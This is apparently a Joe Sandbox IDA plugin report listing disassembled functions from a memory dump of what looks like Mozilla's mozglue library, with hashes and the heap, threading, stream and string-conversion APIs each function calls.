                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                      • String ID:
                                                                                                      • API String ID: 2764315370-0
                                                                                                      • Opcode ID: 5a8e3df209826972fd3d5ba6b3854a0cd6986093783cf541c13f0deffa8e7def
                                                                                                      • Instruction ID: 9b5e40bba30edb2b3317bd19d3ecb8db5d4cc670248833a5965026aaeb33ed59
                                                                                                      • Opcode Fuzzy Hash: 5a8e3df209826972fd3d5ba6b3854a0cd6986093783cf541c13f0deffa8e7def
                                                                                                      • Instruction Fuzzy Hash: B6518472A002158FF714CF69CD80B9AB7A6FF85314F298A39D52597BA4D730F9078B90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6CFDB58D,?,?,?,?,?,?,?,6D00D734,?,?,?,6D00D734), ref: 6CFE8E6E
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CFDB58D,?,?,?,?,?,?,?,6D00D734,?,?,?,6D00D734), ref: 6CFE8EBF
                                                                                                      • free.MOZGLUE(?,?,?,?,6CFDB58D,?,?,?,?,?,?,?,6D00D734,?,?,?), ref: 6CFE8F24
                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CFDB58D,?,?,?,?,?,?,?,6D00D734,?,?,?,6D00D734), ref: 6CFE8F46
                                                                                                      • free.MOZGLUE(?,?,?,?,6CFDB58D,?,?,?,?,?,?,?,6D00D734,?,?,?), ref: 6CFE8F7A
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CFDB58D,?,?,?,?,?,?,?,6D00D734,?,?,?), ref: 6CFE8F8F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: freemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3061335427-0
                                                                                                      • Opcode ID: 4e89082e063b2a0f5fafe0e238a0f1af108202ca8d4db23ace9410e0037a5358
                                                                                                      • Instruction ID: 6783bd304e80b48e28c684aae369575ba1eb3a8bb63e264d0ccab78850cc2d5d
                                                                                                      • Opcode Fuzzy Hash: 4e89082e063b2a0f5fafe0e238a0f1af108202ca8d4db23ace9410e0037a5358
                                                                                                      • Instruction Fuzzy Hash: 7E51B5B1A012569FEB15DF98D8807AFB3B2FF48318F15056AD516AB740E731F904CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CF94E5A
                                                                                                      • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CF94E97
                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF94EE9
                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CF94F02
                                                                                                      • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CF94F1E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 713647276-0
                                                                                                      • Opcode ID: 16f27bb3198af3a859fbc2348422e1c7d62f3ce0e2af6d120a13c193c0348044
                                                                                                      • Instruction ID: 47511ac3e657ede912a0b39a1620b3bcefcf6976a8528a7570dabcf4e52ccc09
                                                                                                      • Opcode Fuzzy Hash: 16f27bb3198af3a859fbc2348422e1c7d62f3ce0e2af6d120a13c193c0348044
                                                                                                      • Instruction Fuzzy Hash: D741D3726087069FEB05CF29C480A9BBBE4FF99348F108A1DF56687741D770E954CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(-00000002,?,6CFA152B,?,?,?,?,6CFA1248,?), ref: 6CFA159C
                                                                                                      • memcpy.VCRUNTIME140(00000023,?,?,?,?,6CFA152B,?,?,?,?,6CFA1248,?), ref: 6CFA15BC
                                                                                                      • moz_xmalloc.MOZGLUE(-00000001,?,6CFA152B,?,?,?,?,6CFA1248,?), ref: 6CFA15E7
                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,6CFA152B,?,?,?,?,6CFA1248,?), ref: 6CFA1606
                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CFA152B,?,?,?,?,6CFA1248,?), ref: 6CFA1637
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 733145618-0
                                                                                                      • Opcode ID: 00522033078b2f4544b7859651a9ce1b4418077b14cdec4dec5638e2ae534545
                                                                                                      • Instruction ID: 45860832b7c339144f465103b1d45b94803efb476a0c764f3691e995c7098918
                                                                                                      • Opcode Fuzzy Hash: 00522033078b2f4544b7859651a9ce1b4418077b14cdec4dec5638e2ae534545
                                                                                                      • Instruction Fuzzy Hash: 4531E872A00114CFD7188EB8D85056FB7B9AF8536472A4B2DE423DBBE4EB30D9068791
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6D00E330,?,6CFBC059), ref: 6CFFAD9D
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6D00E330,?,6CFBC059), ref: 6CFFADAC
                                                                                                      • free.MOZGLUE(?,?,?,?,00000000,?,?,6D00E330,?,6CFBC059), ref: 6CFFAE01
                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,6D00E330,?,6CFBC059), ref: 6CFFAE1D
                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6D00E330,?,6CFBC059), ref: 6CFFAE3D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 3161513745-0
                                                                                                      • Opcode ID: f0360c04452250f937008cdca98412e18a5aee7fbdc9cf075a13d507b21c3d9e
                                                                                                      • Instruction ID: d21aad30cec338f31633f13dad725fed260ed46d6e39327e1c34249df6699ba0
                                                                                                      • Opcode Fuzzy Hash: f0360c04452250f937008cdca98412e18a5aee7fbdc9cf075a13d507b21c3d9e
                                                                                                      • Instruction Fuzzy Hash: 643152B5A003159FEB10DF768C44BABB7F8EF49614F158829E95AD7710E734D801CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6D00DCA0,?,?,?,6CFCE8B5,00000000), ref: 6CFF5F1F
                                                                                                      • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CFCE8B5,00000000), ref: 6CFF5F4B
                                                                                                      • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6CFCE8B5,00000000), ref: 6CFF5F7B
                                                                                                      • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6CFCE8B5,00000000), ref: 6CFF5F9F
                                                                                                      • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CFCE8B5,00000000), ref: 6CFF5FD6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1389714915-0
                                                                                                      • Opcode ID: 51c734c8e03254b14c0ea13af6af28e5595dfcfed54eb782c23ff9b18e1940f7
                                                                                                      • Instruction ID: 95cd46affc2a1feb42e95bf02d240a99aed372f936be8d0839b66c7956a7b2bd
                                                                                                      • Opcode Fuzzy Hash: 51c734c8e03254b14c0ea13af6af28e5595dfcfed54eb782c23ff9b18e1940f7
                                                                                                      • Instruction Fuzzy Hash: 1D310E347006008FE714CF69C898E2ABBF5FF89319B648558E5668B7E5C731EC42CB80
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 6CF9B532
                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6CF9B55B
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CF9B56B
                                                                                                      • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CF9B57E
                                                                                                      • free.MOZGLUE(00000000), ref: 6CF9B58F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                      • String ID:
                                                                                                      • API String ID: 4244350000-0
                                                                                                      • Opcode ID: 7789dc92141d7313288198e0c1f1f0b85c36589a524a1708025e4a4246fc685e
                                                                                                      • Instruction ID: fa7747bbdd44df33f5cc1ab217b304122535f7644137ce287070d379ec934b67
                                                                                                      • Opcode Fuzzy Hash: 7789dc92141d7313288198e0c1f1f0b85c36589a524a1708025e4a4246fc685e
                                                                                                      • Instruction Fuzzy Hash: FA21E771A00205DBEF118FA9CC40BAEBBB9FF86314F284529E918DB345E776D911C7A1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CFF6E78
                                                                                                        • Part of subcall function 6CFF6A10: InitializeCriticalSection.KERNEL32(6D01F618), ref: 6CFF6A68
                                                                                                        • Part of subcall function 6CFF6A10: GetCurrentProcess.KERNEL32 ref: 6CFF6A7D
                                                                                                        • Part of subcall function 6CFF6A10: GetCurrentProcess.KERNEL32 ref: 6CFF6AA1
                                                                                                        • Part of subcall function 6CFF6A10: EnterCriticalSection.KERNEL32(6D01F618), ref: 6CFF6AAE
                                                                                                        • Part of subcall function 6CFF6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CFF6AE1
                                                                                                        • Part of subcall function 6CFF6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CFF6B15
                                                                                                        • Part of subcall function 6CFF6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CFF6B65
                                                                                                        • Part of subcall function 6CFF6A10: LeaveCriticalSection.KERNEL32(6D01F618,?,?), ref: 6CFF6B83
                                                                                                      • MozFormatCodeAddress.MOZGLUE ref: 6CFF6EC1
                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CFF6EE1
                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CFF6EED
                                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6CFF6EFF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                      • String ID:
                                                                                                      • API String ID: 4058739482-0
                                                                                                      • Opcode ID: 034dc4b3a70ab12b9cf3edd88a399da3892af508e2c9d851b579c71c3677070c
                                                                                                      • Instruction ID: 3190263d48391a0b6646b1502a36b8a00ceaff99622ba4d1531de7d15eec28c0
                                                                                                      • Opcode Fuzzy Hash: 034dc4b3a70ab12b9cf3edd88a399da3892af508e2c9d851b579c71c3677070c
                                                                                                      • Instruction Fuzzy Hash: A321C171A0421A8FDB00CF69D8856DE77F8EF88308F044039F81997351EB709A598F92
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • WideCharToMultiByte.KERNEL32 ref: 6CFF76F2
                                                                                                      • moz_xmalloc.MOZGLUE(00000001), ref: 6CFF7705
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CFF7717
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CFF778F,00000000,00000000,00000000,00000000), ref: 6CFF7731
                                                                                                      • free.MOZGLUE(00000000), ref: 6CFF7760
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2538299546-0
                                                                                                      • Opcode ID: dd547cc5572f80fca8a1ada7cab2e9335fbaea745f2f7445c9e08c0d86f572c7
                                                                                                      • Instruction ID: 11c98cc26e867dbf1483c616efb629a1a9dfdd888f9e303fe49fc48a2c8ccc01
                                                                                                      • Opcode Fuzzy Hash: dd547cc5572f80fca8a1ada7cab2e9335fbaea745f2f7445c9e08c0d86f572c7
                                                                                                      • Instruction Fuzzy Hash: 8B11C4B2904215ABE710AFB6CC44BABBEE8EF46354F04442EF858E7300E771984087E2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CF93DEF), ref: 6CFD0D71
                                                                                                      • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CF93DEF), ref: 6CFD0D84
                                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CF93DEF), ref: 6CFD0DAF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$Free$Alloc
                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                      • API String ID: 1852963964-2186867486
                                                                                                      • Opcode ID: 93d9039dfc7762cdaf2dc14c6f7e918bccd32c789aaf43384cb23192b7cbfa6c
                                                                                                      • Instruction ID: 1e1d7c8535e6b6e95bd92db32a13588cc1ea4e97c6806c391e0d3baa5bcd782d
                                                                                                      • Opcode Fuzzy Hash: 93d9039dfc7762cdaf2dc14c6f7e918bccd32c789aaf43384cb23192b7cbfa6c
                                                                                                      • Instruction Fuzzy Hash: 13F0E93139429427F62417E61C09F1B265DA7C2B24F398137F614DE6C4DFD0F80086A6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6CFE75C4,?), ref: 6CFE762B
                                                                                                        • Part of subcall function 6CFACA10: malloc.MOZGLUE(?), ref: 6CFACA26
                                                                                                      • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6CFE74D7,6CFF15FC,?,?,?), ref: 6CFE7644
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFE765A
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CFE74D7,6CFF15FC,?,?,?), ref: 6CFE7663
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CFE74D7,6CFF15FC,?,?,?), ref: 6CFE7677
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 418114769-0
                                                                                                      • Opcode ID: 7a27497fc7e2561a4375aa447816c1cdb9370250609b583f3e847ffc71cca4aa
                                                                                                      • Instruction ID: 2db08356401d954e0f13e3dbec86979860655bea43222ffc9e0b080d3876303c
                                                                                                      • Opcode Fuzzy Hash: 7a27497fc7e2561a4375aa447816c1cdb9370250609b583f3e847ffc71cca4aa
                                                                                                      • Instruction Fuzzy Hash: 1FF08C71D10745ABD7008FA1C889776BBB8FFAB259F11431AF90582601E7B1A5D18BD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 6CFCCBE8: GetCurrentProcess.KERNEL32(?,6CF931A7), ref: 6CFCCBF1
                                                                                                        • Part of subcall function 6CFCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CF931A7), ref: 6CFCCBFA
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD4F2
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD50B
                                                                                                        • Part of subcall function 6CF9CFE0: EnterCriticalSection.KERNEL32(6D01E784), ref: 6CF9CFF6
                                                                                                        • Part of subcall function 6CF9CFE0: LeaveCriticalSection.KERNEL32(6D01E784), ref: 6CF9D026
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD52E
                                                                                                      • EnterCriticalSection.KERNEL32(6D01E7DC), ref: 6CFBD690
                                                                                                      • LeaveCriticalSection.KERNEL32(6D01E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6CFCD1C5), ref: 6CFBD751
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                                      • String ID: MOZ_CRASH()
                                                                                                      • API String ID: 3805649505-2608361144
                                                                                                      • Opcode ID: c3d1ff287d884057170d11db2bb862bc2e1b8134fc19a4403c14a18c86c0ed66
                                                                                                      • Instruction ID: ae73e150063f4f0119d3ceed2cf445dc032f3940e28919c72f44ae3399b8067f
                                                                                                      • Opcode Fuzzy Hash: c3d1ff287d884057170d11db2bb862bc2e1b8134fc19a4403c14a18c86c0ed66
                                                                                                      • Instruction Fuzzy Hash: DC51E471A047028FE314CF69C59475ABBF6FB89304F244A2ED5A9D7B88D770E800CB52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldiv
                                                                                                      • String ID: -%llu$.$profiler-paused
                                                                                                      • API String ID: 3732870572-2661126502
                                                                                                      • Opcode ID: 26e3f834d4129dd8f7176780dff8eaf4cde1fac536e74228e73efe65f4bbda5b
                                                                                                      • Instruction ID: 4ee750678efd8552dce51526cf92a971e7226e85c9892f7049b93889530da9bd
                                                                                                      • Opcode Fuzzy Hash: 26e3f834d4129dd8f7176780dff8eaf4cde1fac536e74228e73efe65f4bbda5b
                                                                                                      • Instruction Fuzzy Hash: 21412671E04709ABCB08DFB9D85129EBFF9EF89744F10863DE85597B81EB3098448792
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • __aulldiv.LIBCMT ref: 6CFE4721
                                                                                                        • Part of subcall function 6CF94410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6CFD3EBD,00000017,?,00000000,?,6CFD3EBD,?,?,6CF942D2), ref: 6CF94444
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldiv__stdio_common_vsprintf
                                                                                                      • String ID: -%llu$.$profiler-paused
                                                                                                      • API String ID: 680628322-2661126502
